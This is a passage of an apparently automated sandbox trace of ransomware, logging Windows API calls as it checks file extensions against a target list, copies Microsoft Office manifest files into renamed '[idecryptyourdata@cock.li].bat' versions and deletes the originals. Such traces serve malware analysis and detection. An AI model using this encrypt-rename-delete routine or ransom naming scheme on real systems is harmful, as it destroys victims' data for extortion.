Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0058.233] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0016-0409-1000-0000000ff1ce.xml")) returned 1 [0058.234] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml") returned 104 [0058.234] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml") returned 104 [0058.234] lstrlenW (lpString=".doc") returned 4 [0058.234] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0058.234] lstrlenW (lpString=".docx") returned 5 [0058.234] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0058.234] lstrlenW (lpString=".pdf") returned 4 [0058.234] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0058.234] lstrlenW (lpString=".xls") returned 4 [0058.234] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0058.234] lstrlenW (lpString=".xlsx") returned 5 [0058.234] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0058.234] lstrlenW (lpString=".ppt") returned 4 [0058.234] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0058.234] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml") returned 104 [0058.234] lstrlenW (lpString=".zip") returned 4 [0058.235] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0058.235] lstrlenW (lpString=".rar") returned 4 [0058.235] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0058.235] lstrlenW (lpString=".bz2") returned 4 [0058.235] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0058.235] lstrlenW (lpString=".7z") returned 3 [0058.235] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0058.235] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml") returned 104 [0058.235] lstrlenW (lpString=".dbf") returned 4 [0058.235] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0058.235] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml") returned 104 [0058.235] lstrlenW (lpString=".1cd") returned 4 [0058.235] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0058.235] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml") returned 104 [0058.235] lstrlenW (lpString=".jpg") returned 4 [0058.235] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0058.235] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml") returned 104 [0058.235] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml") returned 104 [0058.235] lstrlenW (lpString=".doc") returned 4 [0058.235] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0058.235] lstrlenW (lpString=".docx") returned 5 [0058.235] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0058.235] lstrlenW (lpString=".pdf") returned 4 [0058.235] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0058.235] lstrlenW (lpString=".xls") returned 4 [0058.235] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0058.236] lstrlenW (lpString=".xlsx") returned 5 [0058.236] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0058.236] lstrlenW (lpString=".ppt") returned 4 [0058.236] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0058.236] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml") returned 104 [0058.236] lstrlenW (lpString=".zip") returned 4 [0058.236] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0058.236] lstrlenW (lpString=".rar") returned 4 [0058.236] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0058.236] lstrlenW (lpString=".bz2") returned 4 [0058.236] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0058.236] lstrlenW (lpString=".7z") returned 3 [0058.236] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0058.236] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml") returned 104 [0058.236] lstrlenW (lpString=".dbf") returned 4 [0058.236] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0058.236] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml") returned 104 [0058.236] lstrlenW (lpString=".1cd") returned 4 [0058.236] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0058.236] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml") returned 104 [0058.236] lstrlenW (lpString=".jpg") returned 4 [0058.236] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0058.236] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0058.237] lstrlenW (lpString="AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml") returned 53 [0058.237] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0018-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0058.237] GetFileSizeEx (in: hFile=0x354, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=1261) returned 1 [0058.237] CloseHandle (hObject=0x354) returned 1 [0058.237] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0018-0409-1000-0000000ff1ce.xml")) returned 0x220 [0058.237] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0018-0409-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0058.237] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0018-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0058.237] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0058.237] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0058.237] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0018-0409-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0058.238] GetLastError () returned 0x0 [0058.238] ReadFile (in: hFile=0x354, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x4ed, lpOverlapped=0x0) returned 1 [0058.365] WriteFile (in: hFile=0x344, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x4f0, lpOverlapped=0x0) returned 1 [0058.366] ReadFile (in: hFile=0x354, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0058.366] WriteFile (in: hFile=0x344, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x13e, lpOverlapped=0x0) returned 1 [0058.367] SetEndOfFile (hFile=0x344) returned 1 [0058.367] CloseHandle (hObject=0x344) returned 1 [0058.367] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0058.367] SetEndOfFile (hFile=0x354) returned 1 [0058.368] CloseHandle (hObject=0x354) returned 1 [0058.368] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0058.369] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0018-0409-1000-0000000ff1ce.xml")) returned 1 [0058.369] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml") returned 104 [0058.369] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml") returned 104 [0058.369] lstrlenW (lpString=".doc") returned 4 [0058.369] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0058.369] lstrlenW (lpString=".docx") returned 5 [0058.369] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0058.369] lstrlenW (lpString=".pdf") returned 4 [0058.369] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0058.369] lstrlenW (lpString=".xls") returned 4 [0058.370] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0058.370] lstrlenW (lpString=".xlsx") returned 5 [0058.370] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0058.370] lstrlenW (lpString=".ppt") returned 4 [0058.370] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0058.370] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml") returned 104 [0058.370] lstrlenW (lpString=".zip") returned 4 [0058.370] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0058.370] lstrlenW (lpString=".rar") returned 4 [0058.370] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0058.370] lstrlenW (lpString=".bz2") returned 4 [0058.370] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0058.370] lstrlenW (lpString=".7z") returned 3 [0058.370] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0058.370] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml") returned 104 [0058.370] lstrlenW (lpString=".dbf") returned 4 [0058.370] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0058.370] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml") returned 104 [0058.370] lstrlenW (lpString=".1cd") returned 4 [0058.370] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0058.370] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml") returned 104 [0058.370] lstrlenW (lpString=".jpg") returned 4 [0058.370] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0058.370] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml") returned 104 [0058.370] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml") returned 104 [0058.370] lstrlenW (lpString=".doc") returned 4 [0058.370] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0058.370] lstrlenW (lpString=".docx") returned 5 [0058.370] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0058.370] lstrlenW (lpString=".pdf") returned 4 [0058.370] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0058.370] lstrlenW (lpString=".xls") returned 4 [0058.370] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0058.370] lstrlenW (lpString=".xlsx") returned 5 [0058.370] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0058.370] lstrlenW (lpString=".ppt") returned 4 [0058.370] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0058.371] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml") returned 104 [0058.371] lstrlenW (lpString=".zip") returned 4 [0058.371] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0058.371] lstrlenW (lpString=".rar") returned 4 [0058.371] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0058.371] lstrlenW (lpString=".bz2") returned 4 [0058.371] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0058.371] lstrlenW (lpString=".7z") returned 3 [0058.371] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0058.371] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml") returned 104 [0058.371] lstrlenW (lpString=".dbf") returned 4 [0058.371] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0058.371] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml") returned 104 [0058.371] lstrlenW (lpString=".1cd") returned 4 [0058.371] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0058.371] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml") returned 104 [0058.371] lstrlenW (lpString=".jpg") returned 4 [0058.371] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0058.371] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0058.371] lstrlenW (lpString="AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml") returned 53 [0058.371] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0019-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0058.372] GetFileSizeEx (in: hFile=0x354, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=1261) returned 1 [0058.372] CloseHandle (hObject=0x354) returned 1 [0058.372] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0019-0409-1000-0000000ff1ce.xml")) returned 0x220 [0058.372] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0019-0409-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0058.372] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0019-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0058.372] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0058.372] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0058.373] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0019-0409-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0058.373] GetLastError () returned 0x0 [0058.373] ReadFile (in: hFile=0x354, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x4ed, lpOverlapped=0x0) returned 1 [0058.421] WriteFile (in: hFile=0x344, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x4f0, lpOverlapped=0x0) returned 1 [0058.422] ReadFile (in: hFile=0x354, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0058.422] WriteFile (in: hFile=0x344, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x13e, lpOverlapped=0x0) returned 1 [0058.422] SetEndOfFile (hFile=0x344) returned 1 [0058.422] CloseHandle (hObject=0x344) returned 1 [0058.423] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0058.423] SetEndOfFile (hFile=0x354) returned 1 [0058.424] CloseHandle (hObject=0x354) returned 1 [0058.424] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0058.424] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0019-0409-1000-0000000ff1ce.xml")) returned 1 [0058.424] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml") returned 104 [0058.424] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml") returned 104 [0058.424] lstrlenW (lpString=".doc") returned 4 [0058.424] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0058.424] lstrlenW (lpString=".docx") returned 5 [0058.424] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0058.424] lstrlenW (lpString=".pdf") returned 4 [0058.425] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0058.425] lstrlenW (lpString=".xls") returned 4 [0058.425] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0058.425] lstrlenW (lpString=".xlsx") returned 5 [0058.425] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0058.425] lstrlenW (lpString=".ppt") returned 4 [0058.425] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0058.425] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml") returned 104 [0058.425] lstrlenW (lpString=".zip") returned 4 [0058.425] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0058.425] lstrlenW (lpString=".rar") returned 4 [0058.425] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0058.425] lstrlenW (lpString=".bz2") returned 4 [0058.425] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0058.425] lstrlenW (lpString=".7z") returned 3 [0058.425] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0058.425] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml") returned 104 [0058.425] lstrlenW (lpString=".dbf") returned 4 [0058.425] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0058.425] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml") returned 104 [0058.425] lstrlenW (lpString=".1cd") returned 4 [0058.425] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0058.425] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml") returned 104 [0058.425] lstrlenW (lpString=".jpg") returned 4 [0058.425] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0058.425] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml") returned 104 [0058.425] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml") returned 104 [0058.425] lstrlenW (lpString=".doc") returned 4 [0058.425] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0058.425] lstrlenW (lpString=".docx") returned 5 [0058.425] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0058.425] lstrlenW (lpString=".pdf") returned 4 [0058.425] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0058.425] lstrlenW (lpString=".xls") returned 4 [0058.426] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0058.426] lstrlenW (lpString=".xlsx") returned 5 [0058.426] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0058.426] lstrlenW (lpString=".ppt") returned 4 [0058.426] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0058.426] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml") returned 104 [0058.426] lstrlenW (lpString=".zip") returned 4 [0058.426] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0058.426] lstrlenW (lpString=".rar") returned 4 [0058.426] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0058.426] lstrlenW (lpString=".bz2") returned 4 [0058.426] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0058.426] lstrlenW (lpString=".7z") returned 3 [0058.426] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0058.426] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml") returned 104 [0058.426] lstrlenW (lpString=".dbf") returned 4 [0058.426] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0058.426] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml") returned 104 [0058.426] lstrlenW (lpString=".1cd") returned 4 [0058.426] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0058.426] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml") returned 104 [0058.426] lstrlenW (lpString=".jpg") returned 4 [0058.426] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0058.426] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0058.426] lstrlenW (lpString="AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml") returned 53 [0058.426] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001a-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0058.427] GetFileSizeEx (in: hFile=0x354, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=19451) returned 1 [0058.427] CloseHandle (hObject=0x354) returned 1 [0058.427] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001a-0409-1000-0000000ff1ce.xml")) returned 0x220 [0058.427] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001a-0409-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0058.427] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001a-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0058.427] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0058.427] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0058.428] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001a-0409-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0058.428] GetLastError () returned 0x0 [0058.428] ReadFile (in: hFile=0x354, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: 